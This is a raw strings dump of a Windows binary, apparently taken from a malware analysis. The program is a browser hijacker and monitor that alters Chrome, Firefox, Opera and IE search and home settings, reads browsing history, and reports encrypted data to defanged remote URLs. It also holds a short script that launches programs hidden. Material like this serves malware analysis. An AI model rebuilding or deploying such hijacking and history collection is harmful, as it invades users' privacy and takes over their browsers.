On tree page %d cell %d:

On page %d at right child:

Multiple uses for byte %d of page %d

Corruption detected in cell %d on page %d

Fragmentation of %d bytes reported as %d on page %d

Page %d is never used

Outstanding page count goes from %d to %d during this analysis

Pointer map page %d is referenced

keyinfo(%d

%s(%d)

foreign key constraint failed

%s-mjX

unable to use function %s in the requested context

bind on a busy prepared statement: [%s]

zeroblob(%d)

constraint failed at %d in [%s]

abort at %d in [%s]: %s

no such savepoint: %s

cannot open savepoint - SQL statements in progress

cannot rollback transaction - SQL statements in progress

cannot %s savepoint - SQL statements in progress

cannot commit transaction - SQL statements in progress

sqlite_temp_master

SELECT name, rootpage, sql FROM '%q'.%s WHERE %s ORDER BY rowid

sqlite_master

cannot change %s wal mode from within a transaction

statement aborts at %d: [%s] %s

database table is locked: %s

cannot open view: %s

cannot open virtual table: %s

foreign key

no such column: "%s"

cannot open %s column for writing

indexed

cannot open value of type %s

misuse of aliased aggregate %s

%s: %s.%s.%s

%s: %s

%s: %s.%s

not authorized to use function: %s

%r %s BY term out of range - should be between 1 and %d

too many terms in %s BY clause

variable number must be between ?1 and ?%d

Expression tree is too large (maximum depth %d)

too many columns in %s

too many SQL variables

misuse of aggregate: %s()

%s%.*s"%w"

%.*s"%w"%s

sqlite_rename_table

sqlite_rename_parent

sqlite_rename_trigger

%s OR name=%Q

there is already another table or index with this name: %s

table %s may not be altered

sqlite_

UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;

view %s may not be altered

sqlite_sequence

UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d 18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');

UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;

UPDATE "%w".sqlite_sequence set name = %Q WHERE name = %Q

Cannot add a PRIMARY KEY column

UPDATE "%w".%s SET sql = substr(sql,1,%d) || ', ' || %Q || substr(sql,%d) WHERE type = 'table' AND name = %Q

sqlite_stat1

sqlite_altertab_%s

CREATE TABLE %Q.%s(%s)

DELETE FROM %Q.%s WHERE tbl=%Q

invalid name: "%s"

SELECT idx, stat FROM %Q.sqlite_stat1

too many attached databases - max %d

database %s is already in use

unable to open database: %s

cannot detach database %s

no such database: %s

database %s is locked

sqlite_attach

sqlite_detach

%s %T cannot reference objects in database %s

access to %s.%s is prohibited

access to %s.%s.%s is prohibited

object name reserved for internal use: %s

too many columns on %s

there is already an index named %s

default value of column [%s] is not constant

duplicate column name: %s

AUTOINCREMENT is only allowed on an INTEGER PRIMARY KEY

table "%s" has more than one primary key

no such collation sequence: %s

UPDATE %Q.%s SET type='%s', name=%Q, tbl_name=%Q, rootpage=#%d, sql=%Q WHERE rowid=#%d

CREATE %s %.*s

CREATE TABLE %Q.sqlite_sequence(name,seq)

view %s is circularly defined

table %s may not be dropped

UPDATE %Q.%s SET rootpage=%d WHERE #%d AND rootpage=#%d

use DROP VIEW to delete view %s

use DROP TABLE to delete table %s

DELETE FROM %Q.%s WHERE tbl_name=%Q and type!='trigger'

DELETE FROM %s.sqlite_sequence WHERE name=%Q

foreign key on %s should reference only one column of table %T

DELETE FROM %Q.sqlite_stat1 WHERE tbl=%Q

unknown column "%s" in foreign key definition

number of columns in foreign key does not match the number of columns in the referenced table

indexed columns are not unique

table %s may not be indexed

virtual tables may not be indexed

views may not be indexed

index %s already exists

there is already a table named %s

table %s has no column named %s

sqlite_autoindex_%s_%d

INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);

CREATE%s INDEX %.*s

no such index: %S

DELETE FROM %Q.%s WHERE name=%Q

index associated with UNIQUE or PRIMARY KEY constraint cannot be dropped

DELETE FROM %Q.sqlite_stat1 WHERE idx=%Q

a JOIN clause is required before %s

unable to identify the object to be reindexed

cannot modify %s because it is a view

table %s may not be modified

sqlite_source_id

sqlite_version

sqlite_compileoption_get

sqlite_compileoption_used

foreign key mismatch

table %S has %d columns but %d values were supplied

table %S has no column named %s

%d values for %d columns

%s.%s may not be NULL

PRIMARY KEY must be unique

sqlite3_extension_init

no entry point [%s] in shared library [%s]

unable to open shared library [%s]

automatic extension loading failed: %s

error during initialization: %s

foreign_keys

foreign_key_list

*** in database %s ***

unsupported encoding: %s

malformed database schema (%s)

%s - %s

SELECT name, rootpage, sql FROM '%q'.%s ORDER BY rowid

unsupported file format

database schema is locked: %s

RIGHT and FULL OUTER JOINs are not currently supported

unknown or unsupported join type: %T %T%s%T

cannot have both ON and USING clauses in the same join

a NATURAL join may not have an ON or USING clause

cannot join using column %s - column not present in both tables

%s.%s

ORDER BY clause should come after %s not before

%s:%d

SELECTs to the left and right of %s do not have the same number of result columns

LIMIT clause should come after %s not before

sqlite_subquery_%p_

no such index: %s

no such table: %s

sqlite3_get_table() called with two or more incompatible queries

cannot create %s trigger on view: %S

INSERT INTO %Q.%s VALUES('trigger',%Q,%Q,0,'CREATE TRIGGER %q')

cannot create INSTEAD OF trigger on table: %S

no such trigger: %S

no such column: %s

-- TRIGGER %s

PRAGMA vacuum_db.synchronous=OFF

SELECT 'CREATE TABLE vacuum_db.' || substr(sql,14) FROM sqlite_master WHERE type='table' AND name!='sqlite_sequence' AND rootpage>0

SELECT 'CREATE UNIQUE INDEX vacuum_db.' || substr(sql,21) FROM sqlite_master WHERE sql LIKE 'CREATE UNIQUE INDEX %'

SELECT 'CREATE INDEX vacuum_db.' || substr(sql,14) FROM sqlite_master WHERE sql LIKE 'CREATE INDEX %'

SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'

SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0

INSERT INTO vacuum_db.sqlite_master SELECT type, name, tbl_name, rootpage, sql FROM main.sqlite_master WHERE type='view' OR type='trigger' OR (type='table' AND rootpage=0)

SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';

UPDATE %Q.%s SET type='table', name=%Q, tbl_name=%Q, rootpage=0, sql=%Q WHERE rowid=#%d

vtable constructor did not declare schema: %s

vtable constructor failed: %s

no such module: %s

at most %d tables in a join

table %s: xBestIndex returned an invalid plan

TABLE %s

cannot use index: %s

%s WITH AUTOMATIC INDEX

%s AS %s

%s VIA MULTI-INDEX UNION

%s WITH INDEX %s

%s VIRTUAL TABLE INDEX %d:%s

%s USING PRIMARY KEY

%s ORDER BY

the NOT INDEXED clause is not allowed on UPDATE or DELETE statements within triggers

the INDEXED BY clause is not allowed on UPDATE or DELETE statements within triggers

SHELL32.dll

SHLWAPI.dll

GetProcessHeap

KERNEL32.dll

USER32.dll

RegOpenKeyExA

RegCloseKey

RegOpenKeyExW

ADVAPI32.dll

ole32.dll

OLEAUT32.dll

WinHttpReceiveResponse

WinHttpSendRequest

WinHttpConnect

WinHttpCloseHandle

WinHttpQueryDataAvailable

WinHttpOpen

WinHttpOpenRequest

WinHttpReadData

WinHttpGetIEProxyConfigForCurrentUser

WINHTTP.dll

GetExtendedTcpTable

IPHLPAPI.DLL

WS2_32.dll

PSAPI.DLL

WTSAPI32.dll

Secur32.dll

CryptMsgClose

CertGetNameStringW

CertFreeCertificateContext

CertFindCertificateInStore

CertCloseStore

CryptMsgGetParam

CRYPT32.dll

USERENV.dll

HttpSendRequestExW

HttpSendRequestW

HttpAddRequestHeadersW

HttpQueryInfoW

HttpOpenRequestW

HttpEndRequestW

WININET.dll

CreatePipe

ConnectNamedPipe

CreateNamedPipeW

DisconnectNamedPipe

GetNamedPipeInfo

GetCPInfo

RegCreateKeyW

RegCreateKeyExW

RegOpenKeyW

RegQueryInfoKeyW

RegDeleteKeyA

RegDeleteKeyW

RegEnumKeyExA

RegCreateKeyA

RegCreateKeyExA

RegQueryInfoKeyA

RegOpenKeyA

RegEnumKeyExW

RegEnumKeyW

zcÁ

.?AVImplementation@ReportBuilder@Monitor@SpeedBit@@

.?AVReportBuilder@Monitor@SpeedBit@@

.?AVHistoryReportFactory@Implementation@ServerReporter@Monitor@SpeedBit@@

.?AVImplementation@ServerReporter@Monitor@SpeedBit@@

.?AVServerReporter@Monitor@SpeedBit@@

.?AVReportFactory@Implementation@ServerReporter@Monitor@SpeedBit@@

.?AVSendReportTask@Implementation@WatchmanMonitor@Monitor@SpeedBit@@

.?AVEventHandler@SendReportTask@Implementation@WatchmanMonitor@Monitor@SpeedBit@@

.?AVCHttpAsync@@

.?AVPipedProcess@Utils@SpeedBit@@

.?AVImplementation@PipedProcess@Utils@SpeedBit@@

.?AVImplementation@MachineKey@Utils@SpeedBit@@

.?AVMachineKey@Utils@SpeedBit@@

.?AVCHttp@@

.?AVChromeBrowserHistory@SQLite@SpeedBit@@

.?AVException@sql@@

.?AVLoader@Extension@Chrome@SpeedBit@@

.?AVImplementation@Extension@Chrome@SpeedBit@@

.?AVBrowserInfo@Chrome@SpeedBit@@

.?AVFactory@BrowserInfo@Chrome@SpeedBit@@

.?AVImplementation@BrowserInfo@Chrome@SpeedBit@@

.?AVImplementation@Factory@BrowserInfo@Chrome@SpeedBit@@

.?AVExtension@Chrome@SpeedBit@@

.?AVWebDataDB@SQLite@SpeedBit@@

.?AVImplementation@WebDataDB@SQLite@SpeedBit@@

.?AVFirefoxSettings@Implementation@Snapshot@Injection@SpeedBit@@

.?AVSettings@Chrome@Snapshot@Injection@SpeedBit@@

.?AVChromeSettings@Implementation@Snapshot@Injection@SpeedBit@@

.?AVSettings@Firefox@Snapshot@Injection@SpeedBit@@

.?AVSettings@Chrome@General@Config@SpeedBit@@

.?AVUrlSet@Implementation@General@Config@SpeedBit@@

.?AVFirefoxValueSet@Implementation@General@Config@SpeedBit@@

.?AVOperaSettings@Implementation@General@Config@SpeedBit@@

.?AVSettings@Firefox@General@Config@SpeedBit@@

.?AVSettings@Opera@General@Config@SpeedBit@@

.?AVFirefoxSettings@Implementation@General@Config@SpeedBit@@

.?AVChromeSettings@Implementation@General@Config@SpeedBit@@

.?AVChromeValueSet@Implementation@General@Config@SpeedBit@@

.?AVValueSet@Chrome@General@Config@SpeedBit@@

.?AVUrlSet@General@Config@SpeedBit@@

.?AVValueSet@Firefox@General@Config@SpeedBit@@

.?AVChromeSettings@Implementation@User@Config@SpeedBit@@

.?AVSettings@Firefox@User@Config@SpeedBit@@

.?AVFirefoxSettings@Implementation@User@Config@SpeedBit@@

.?AVSettings@Chrome@User@Config@SpeedBit@@

.?AVProfile@Implementation@InstallInfo@Firefox@SpeedBit@@

.?AVInstallInfo@Firefox@SpeedBit@@

.?AVProfile@InstallInfo@Firefox@SpeedBit@@

.?AVInstallInfo@Implementation@0Firefox@SpeedBit@@

.?AVBrowserSettings@Implementation@0Firefox@SpeedBit@@

.?AVBrowserSettings@Firefox@SpeedBit@@

.?AVBrowserSettings@Implementation@0Chrome@SpeedBit@@

.?AVBrowserSettings@Chrome@SpeedBit@@

if (WScript.Arguments.length > 0)

var root = WScript.Arguments(0);

for (var i = 1, n = WScript.Arguments.length; i < n;   i)

args.push(WScript.Arguments(i));

var path = "\""   root.replace(/\\*$/, "").replace(/\//g, "\\")   "\"";

path  = " \""   args.join("\" \"")   "\"";

var shell = WScript.CreateObject("WScript.Shell");

shell.Run(path, 0, false);

<requestedExecutionLevel level='highestAvailable' uiAccess='false' />

1(1-1F1S1X1n1}1

00151@1\1

040;0_0~0

?%?)?.?3?>?

=2=9=`=->:>

0"161\1}1

<0;5^5}6

1!1)141=1

8"9(9,90949

>.?4?8?<?@?

2 2$2(2,272

:%:,:2:8:

4 4$4(4,4044484<4@4

$5(5,5054585

; ;$;(;,;0;4;8;<;@;

> >$>(>,>0>4>8>

? ?,?0?4?8?<?

,0004080

6 6$6(6,6

7 7(707<7`7

combase.dll

kernel32.dll

mscoree.dll

- floating point support not loaded

- CRT not initialized

- Attempt to initialize the CRT more than once.

portuguese-brazilian

USER32.DLL

Injection::Snapshot::Controller::IsChromeInstalled

Chrome installed:

Injection::Snapshot::Controller::IsFirefoxInstalled

Firefox installed:

Chrome unchanged:

Firefox unchanged:

Checking<Parameter.Input>

Checking<Parameter.Key>

777705555443332

5555443332

5555443332

logs\${ModuleName}.${Pid}.log

WatchmanKey::TimeBomb::UninstallTimeBomb

Reporting

PChromeExtensionMonitorWorkerThread started

ChromeExtensionMonitor::CollectExtensionInfo

ChromeExtensionMonitor::CheckExtension

8Reset DNS to 8.8.8.8 for adapter

WinHTTP Example/1.0

VVV.google.com

SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows

Registry::Helper::RegOpenKeyExA

Chrome::StartPageProtectionEnabled

Chrome::SearchEngineProtectionEnabled

Chrome::RestoreOnStartupProtectionEnabled

Chrome::StartPageProtectionDisabled

Chrome::SearchEngineProtectionDisabled

Chrome::RestoreOnStartupProtectionDisabled

Firefox::StartPageChangedByUser

Firefox::SearchEngineChangedByUser

Explorer.HomePageEvent:

Explorer.SearchEngineEvent:

Firefox.HomePageEvent:

Firefox.SearchEngineEvent:

ProcessCatcher::ExecutionContext::Resume

Allocation<ExecutionContext>

iexplore.exe

rundll32.exe

chrome.exe

firefox.exe

opera.exe

safari.exe

navigator.exe

torch.exe

U.exe

epic.exe

browser.exe

Maxthon.exe

sbframe.exe

avant.exe

dragon.exe

bobrowser.exe

crossbrowse.exe

vosteran.exe

ProcessMonitor::ExecutionContext::Resume

E:\iexplore.exe|E:\rundll32.exe

E:\chrome.exe

E:\firefox.exe

E:\opera.exe

E:\Safari.exe|E:\crossbrowse.exe|E:\torch.exe|E:\U.exe|E:\epic.exe|E:\vosteran.exe|E:\browser.exe|E:\avant.exe|E:\bobrowser.exe

smci32.dll

smi32.exe

Utils::PipedProcess::Create

Utils::PipedProcess::Start

Utils::PipedProcess::WriteData

[ReportDllsThread]

ProcessWatcher::ExecutionContext::Resume

Local proxy port:

127.0.0.1

[ProxyMonitor::getProcessByPort]

Failed to get GetExtendedTcpTable

smei32.dll

[ReportBuilder::MakeDefaultBrowserSettingsElement]

[ReportBuilder::CalculateHash]

Result.Hash:

[ReportBuilder::MakeHistoryReport]

Building history report...

ReportBuilder::GetWMISystemInfo

ReportBuilder::GetExplorerBrowserInfo

ReportBuilder::GetChromeBrowserInfo

. Chrome Search:

History Report:

[ReportBuilder::MakeReport]

Report:

[ReportBuilder::GetExplorerBrowserInfo]

[ReportBuilder::GetChromeBrowserInfo]

Chrome::BrowserInfo::Factory::Create

Chrome::BrowserInfo::Factory::GetInfo

sma.exe

Utils::PipedProcess::ReadData

Utils::PipedProcess::Wait

Utils::PipedProcess::WriteEof

Utils::MachineKey::Create

Utils::MachineKey::Generate

Encrypt data. Key:

Decrypt data. Key:

ReportBuilder::MakeInstallReport

[ServerReporter::SendInstallReport]

ReportBuilder::MakeUninstallReport

[ServerReporter::SendUninstallReport]

ReportBuilder::MakeRegulatReport

[ServerReporter::SendRegularReport]

ReportBuilder::MakeUserActionReport

[ServerReporter::SendUserActionReport]

ReportBuilder::MakeHistoryReport

[ServerReporter::SendHistoryReport]

ServerReporter::MakeReport

ServerReporter::SendReport

[ServerReporter::SendReport]

ServerEncryption::CreateSessionKey

Report in Base 64:

10D2FBE6-2346-4627-A9F5-FB48313C5001

ServerReporter::Implementation::GetTargetUrl - User GUID is problematic GUID (hardcoded/unknown)

ServerReporter::Implementation::GetTargetUrl - Failed replacing problematic GUID with new one

[ServerReporter::GetUserProfile]

[ServerReporter::MakeReport]

ServerReporter::GetUserProfile

ReportBuilder::Create

Result.Report:

[ServerReporter::SetLastReportTime]

WatchmanKey::Reporter::SetLastTime

Package url:

WatchmanKey::Updater::SetLastTime

.Service

\Microsoft\Windows\Start Menu

*.lnk

\Internet Explorer\iexplore.exe

\Safari\Safari.exe

/report

/report1

%d.%d.%d.%d%n

Created URL Set object from configuration. Name:

UrlSetID:

Could not find matching URL set... Using old configuration

[LocalScope::UpdateParser::ParseReportSection]

Monitor::ServerEncryption::CreateSessionKey

Full url:

Data url:

sbu.exe

smw.sys

wscript.exe

smhe.js

[Monitor::WatchmanGuard::SendReport]

InstallReporter

Monitor::ServerReporter::Create

Monitor::ServerReporter::SendInitialReport

/urlset:

Options.InjectAllBrowsers:

Options.InjectDefaultOnly:

Options.ServiceName:

Options.ProductCode:

Options.ProductPriority:

Options.EnablePinner:

Options.EnableRedirect:

Options.EnableYellowBandSuppression:

Options.UpdateUrl:

Options.ReportUrl:

Options.AutoStart:

Options.ProtectSearch:

Options.ProtectHome:

Options.ProtectTab:

Options.ExplorerInjection:

Options.ChromeInjection:

Options.FirefoxInjection:

Options.OperaInjection:

Options.ConfigPath:

Options.ConfigKey:

Getting current URL Set

Getting URL Set from options

] Provided. And is different from current URL set [

URL Set [

general_config.xml

system_config.xml

[WatchmanInstaller::SendReport1]

iexplore.exe is running, result for getting DLL's:

firefox.exe is running, result for getting DLL's:

chrome.exe is running, result for getting DLL's:

ServerReporter::Create

URL to use:

ServerReporter::SendRegularReport

[WatchmanInstaller::SendReport]

Currently set URLSet:

Updating system config with new URL set...

Already reported duiring first install

Report' been sent:

WatchmanInstaller::SendReport1

calling SendReport1...

WatchmanInstaller::SendReport

[Monitor::WatchmanMonitor::CreateSendReportTask]

SendReportTask

new<SendReportTask>

[Monitor::WatchmanMonitor::OnSendReportSucceeded]

[Monitor::WatchmanMonitor::OnSendReportFailed]

Need to send report!!!

Original report URL:

ServerReporter::SendInitialReport

[Monitor::WatchmanMonitor::OnChromeProtectionChanged]

User has changed the chrome protection for:

[Monitor::WatchmanMonitor::OnResetFirefoxProtection]

User has reset the firefox protection:

Next report task:

Scheduller::RegisterTask<SendReportTask>

Monitor::Application::EnsureSystemKey

Options.Revert:

Settings.Final:

@ADVAPI32.DLL

shlwapi.dll

Utils::Registry::OpenKeyExW

Subkey:

[Utils::Registry::RecursiveDeleteKeyW]

SHLWAPI.GetAddressOf<SHDeleteKeyW>

WKERNEL32.DLL

VERSION.DLL

hXXp://d1y2jryd6u59ns.cloudfront.net/p.ashx

\\.\pipe\

Could not create thread event. %%s

Could not create new client event. %%s

Could not create accept thread. %%s

Could not create work thread. %%s

Could not start thread. %%s

Stop IPC error. %%s

Pipe (0x%X) read problems. %%s

ENTDLL.DLL

Windows NT 6.1

%s?e=%s

zvl=%s&

%s?prd=%s&aff=%s&ver=%s&rnd=%d&usid=%s&pixGuid=%s

&tss=%d&action=%s&actionparam=%s

[Utils::PipedProcess::CreateOutputHandles]

[Utils::PipedProcess::CreateInputHandles]

[Utils::PipedProcess::SpawnProcess]

Utils::PipedProcess::CreateOutputHandles

Utils::PipedProcess::CreateInputHandles

Utils::PipedProcess::SpawnProcess

[Utils::PipedProcess::Start]

[Utils::PipedProcess::Wait]

Utils::PipedProcess::WriteProc

[Utils::PipedProcess::WriteData]

Utils::PipedProcess::ReadProc

[Utils::PipedProcess::ReadData]

.cache

ntdll.dll

Could not open memory object. Object name: %s. %%s

Could not create memory object. Object name: %s. %%s

Could not map memory object. Object name: %s. Size: %u. %%s

Could not map memory object. Object name: %s. %%s

Could not create sync object for memory. Object name: %s. %%s

pathToSignedProductExe

SELECT * FROM Win32_OperatingSystem

[BrowserHistory::GetPropertyReport]

Found URL:

FIPHLPAPI.DLL

X-hX-hX-XX-XXXXXX

IExecAction::put_Path

IAction::QueryInterface<IExecAction>

IExecAction::put_Arguments

IExecAction::put_WorkingDirectory

http\shell\open\command

Software\Microsoft\Windows\CurrentVersion\App Paths

[Utils::SoftwareInfo::GetHttpOpenHandler]

Utils::Registry::OpenKeyW

SOFTWARE\Microsoft\Windows\CurrentVersion\Group Policy

Could not create pipe. %%s

Could not allocate IPC memory. Requires size: %u

Event error. %%s

Could not create pipe event. %%s

Pipe connecting error. %%s

Error code: %u ('%s')

Not enough memory. Size: %s (%s)

Could not create IPC event. %%s

Fhttp

Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Content-Type: multipart/form-data; boundary=%s

XXX

HTTP/1.1

Content-Disposition: form-data; name="%s"

Software\Microsoft\Windows\CurrentVersion\Internet Settings

HTTP/1.0

SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall

SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}

[SynchronousPipe::Read]

[SynchronousPipe::Write]

CChromeExtension::GetFileListInExtenstion

__MSG_

messages.json

manifest.json

CHROME.EXE

[Chrome::BrowserInfo::Query]

WebData

SHELL32.DLL

e\Application\chrome.exe

Google\Chrome

\resources.pak

\Google\Chrome\Application\chrome.exe

\Google\Chrome\Application\

\Web Data

[SQLite::Implementation::AddProvider]

[SQLite::Implementation::GetProviderById]

[SQLite::Implementation::GetFirstProviderId]

[SQLite::Implementation::GetProviderByKeyword]

[SQLite::Implementation::GetProviderId]

chrome-extension://

13050095043000000

hXXp://api.searchpredict.com/api/?rqtype=ffplugin&siteID=8661&dbCode=1&command={searchTerms}

4BB42133-5533-4A0C-BF72-F1B8C8776A11

Checking<extensions.settings>

[Injection::Snapshot::Chrome::Settings::Dump]

[Injection::Snapshot::Firefox::Settings::Dump]

[Monitor::RestoreData::Controller::Build<ChromeSettings>]

[Monitor::RestoreData::Controller::Build<FirefoxSettings>]

[Injection::Snapshot::Builder::BuildSettings<ChromeSettings>]

[Injection::Snapshot::Builder::BuildSettings<FirefoxSettings>]

Injection::Snapshot::Parser::Parse<ChromeSettings>

new<ChromeSettings>

Injection::Snapshot::Parser::Parse<FirefoxSettings>

new<FirefoxSettings>

[Injection::Snapshot::Parser::Parse<ChromeSettings>]

ReadStringNode<AboutTabsUrl>

ReadStringNode<DefaultProviderKeyword>

[Injection::Snapshot::Parser::Parse<FirefoxSettings>]

Chrome::BrowserSettings::Create

[Injection::Snapshot::Controller::IsChromeInstalled]

Firefox::BrowserSettings::Create

[Injection::Snapshot::Controller::IsFirefoxInstalled]

Firefox::BrowserSettings::RestoreState

Chrome::BrowserSettings::RestoreState

Argument.SystemConfig:

Argument.Config::User:

Argument.Config::General:

Chrome::BrowserSettings::PropagateState

Firefox::BrowserSettings::PropagateState

Argument.UserSid:

WatchmanKey::Users::SaveRestoreData

[WatchmanKey::GetEncryptionKey]

MachineKey::Generate

MachineKey::Create

[WatchmanKey::LoadEncodedData]

[WatchmanKey::CleanupKey]

WatchmanKey::GetEncryptionKey

[WatchmanKey::SaveEncodedData]

WatchmanKey::System::Open

[WatchmanKey::System::LoadGeneralConfig]

[WatchmanKey::System::SaveGeneralConfig]

WatchmanKey::LoadEncodedData

WatchmanKey::SaveEncodedData

WatchmanKey::System::Ensure

[WatchmanKey::System::SaveSystemConfig]

[WatchmanKey::System::LoadSystemConfig]

WatchmanKey::EnsureKey

[WatchmanKey::Users::Ensure]

WatchmanKey::OpenKey

[WatchmanKey::Users::Open]

[WatchmanKey::Users::LoadConfiguration]

[WatchmanKey::Users::SaveConfiguration]

WatchmanKey::Users::Ensure

[WatchmanKey::Users::LoadRestoreData]

[WatchmanKey::Updater::SetLastTime]

[WatchmanKey::Updater::GetBlackListHash]

[WatchmanKey::Updater::SetBlackListHash]

[WatchmanKey::Reporter::SetLastTime]

[WatchmanKey::Reporter::GetLastTime]

[WatchmanKey::TimeBomb::Uninstall]

WatchmanKey::SystemKey::Open

{CFBFAE00-17A6-11D0-99CB-00C04FD64497}

{7F4EFF06-7032-458e-AE16-1C1D8255C28A}

smod.xml

SearchModulePlus.crx

DATAMNGR.DLL

IEBHO.DLL

VC32.DLL

[Config::General::UrlSet::Copy]

[Config::General::Chrome::Settings::Dump]

[Config::General::Chrome::ValueSet::Copy]

[Config::General::Chrome::Settings::Copy]

[Config::General::Firefox::Settings::Copy]

[Config::General::Firefox::Settings::Dump]

[Config::General::Opera::Settings::Dump]

[Config::General::Firefox::ValueSet::Copy]

[Config::General::Opera::Settings::Copy]

Config::General::Parser::ParseUrlSet

Config::General::Parser::ParseFirefoxSettings

Config::General::Parser::ParseChromeSettings

Config::General::Parser::ParseOperaSettings

ReadStringNode<StartPageUrl>

ReadStringNode<AboutTabUrl>

eReadStringNode<SearchScopeUrl>

ReadStringNode<SearchScopeIconUrl>

ReadStringNode<SearchScopeSuggestUrl>

[Config::General::Parser::ParseChromeSettings]

Config::General::Parser::ParseChromeValueSets

MissedElement<GoogleChrome>

ReadStringNode<HomePageUrl>

[Config::General::Parser::ParseChromeValueSets]

ReadStringNode<DefaultProviderSearchUrl>

ReadStringNode<DefaultProviderIconUrl>

[Config::General::Parser::ParseFirefoxSettings]

ReadStringNode<DefaultProviderSuggestUrl>

Config::General::Parser::ParseFirefoxValueSets

MissedElement<MozillaFirefox>

ReadOptionalStringNode<HomePageUrl>

[Config::General::Parser::ParseFirefoxValueSets]

ReadOptionalStringNode<SearchPluginUrl>

lReadOptionalStringNode<SearchPluginSuggestionUrl>

MissedElement<UrlSet>

[Config::General::Parser::ParseUrlSet]

ReadStringNode<TabPageUrl>

ReadStringNode<SearchEngineFaviconUrl>

yReadStringNode<SearchEngineSuggestionUrl>

ReadStringNode<SearchEngineSearchUrl>

[Config::General::Parser::ParseOperaSettings]

ReadStringNode<SearchEngineKeyword>

MissedElement<Opera>

ReadStringNode<Key>

[Config::General::Builder::Build<ChromeSettinsg>]

[Config::General::Builder::Build<OperaSettinsg>]

[Config::General::Builder::Build<FirefoxSettinsg>]

We couldn't find the URL Set section... probably an old configuration!

WatchmanKey::System::LoadGeneralConfig

WatchmanKey::System::SaveGeneralConfig

2.1.0.7

2.0.0.0

ReadOptionalStringNode<UrlSet>

ReadStringNode<ReportUrl>

ReadStringNode<UpdateUrl>

ReadBooleanNode<MozillaFirefox>

ReadBooleanNode<GoogleChrome>

Could not find URL Set in configuration. Probably older configuration.

ReadBooleanNode<Opera>

WatchmanKey::System::LoadSystemConfig

WatchmanKey::System::SaveSystemConfig

[Config::User::Chrome::Settings::Copy]

[Config::User::Firefox::Settings::Copy]

Config::User::Parser::ParseChromeSettings

Config::User::Parser::ParseFirefoxSettings

[Config::User::Parser::ParseChromeSettings]

[Config::User::Parser::ParseFirefoxSettings]

[Config::User::Builder::BuildFirefoxSettings]

[Config::User::Builder::BuildChromeSettings]

WatchmanKey::User::LoadConfiguration

WatchmanKey::User::SaveConfiguration

Mozilla\Firefox\

profiles.ini

prefs.js

[Firefox::InstallInfo::ReadProfiles]

[Firefox::InstallInfo::QueryProfiles]

[Firefox::InstallInfo::ParseProfiles]

Firefox::InstallInfo::ReadProfiles

Firefox::InstallInfo::ParseProfiles

[Firefox::InstallInfo::Query]

No profiles found! Maybe - first start of Firefox?

J[Firefox::BrowserSettings::MakeSnapshot]

[Firefox::BrowserSettings::RestoreState]

[Firefox::BrowserSettings::PropagateState]

Software\Microsoft\Windows\CurrentVersion\Ext\Settings

Software\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects

Software\Microsoft\Internet Explorer\AboutURLs

TopResultURLFallback

SuggestionURL

FaviconURL

IEXPLORE.EXE

Failed to call enum URL's. Error:

Software\Microsoft\Internet Explorer\URLSearchHooks

[Explorer::BrowserSettings::SetMainKeyValues]

[Explorer::BrowserSettings::SetTabbedBrowsingKeyValues]

[Explorer::BrowserSettings::SetSearchScopeKeyValues]

[Explorer::BrowserSettings::SetAboutURLsKeyValues]

Result.SearchScope:

Argument.SearchScopeToSearch:

Argument.Parent:

[Explorer::BrowserSettings::DeleteKey]

Argument.Subkey:

VirtualSpeedbitSearchScopeKey::EnsureKeyW

Key deleted:

BTopResultURL

FaviconURLFallback

SuggestionsURL

SuggestionsURLFallback

\Opera\launcher.exe

Opera Software\Opera Stable\

\Opera\

\opera.pak

Web Data

\resources\default_partner_content.json

KERNELBASE.DLL

Chrome::InstallInfo::Get

[Chrome::BrowserSettings::OpenConfigFiles]

SQLite::WebDataDB::Create

Argument.HomePageUrl:

[Chrome::BrowserSettings::SetHomePagePreferences]

[Chrome::BrowserSettings::SetDefaultProviderPreferences]

Argument.HomePageIsNewTabPage:

Argument.DefaultProviderKeyWord:

Argument.DefaultProviderId:

Argument.DefaultProviderEncoding:

Argument.DefaultProviderName:

Argument.DefaultProviderIconUrl:

Argument.DefaultProviderSearchUrl:

[Chrome::BrowserSettings::SetRestoreOnStartupPreferences]

Argument.DefaultProviderSuggestUrl:

Argument.UrlsToRestoreOnStartup:

Argument.RestoreOnStartup:

Argument.KeywordToSearch:

[Chrome::BrowserSettings::GetSearchProviderId]

SQLite::WebDataDB::GetProviderById

SQLite::WebDataDB::GetFirstProviderId

[Chrome::BrowserSettings::EnsureSearchProvider]

Result.ProviderId:

[Chrome::BrowserSettings::DeleteSearchProvider]

SQLite::WebDataDB::Values::Create

[Chrome::BrowserSettings::MakeSnapshot]

[Chrome::BrowserSettings::RestoreState]

Chrome::BrowserSettings::DeleteSearchProvider

Chrome::BrowserSettings::OpenConfigFiles

SQLite::WebDataDB::SetDefaultProvider

[Chrome::BrowserSettings::PropagateState]

Chrome::BrowserSettings::EnsureSearchProvider

%Program Files%\Common Files\Goobzo\GBUpdatePlus\smu.exe

BROWSE~2.EXE_3272:

.text

`.rdata

@.data

.rsrc

@.reloc

broken pipe

inappropriate io control operation

not supported

operation in progress

operation not permitted

operation not supported

operation would block

protocol not supported

function not supported

operation canceled

address_family_not_supported

operation_in_progress

operation_not_supported

protocol_not_supported

operation_would_block

address family not supported

operator

GetProcessWindowStation

Process token open Error: %u

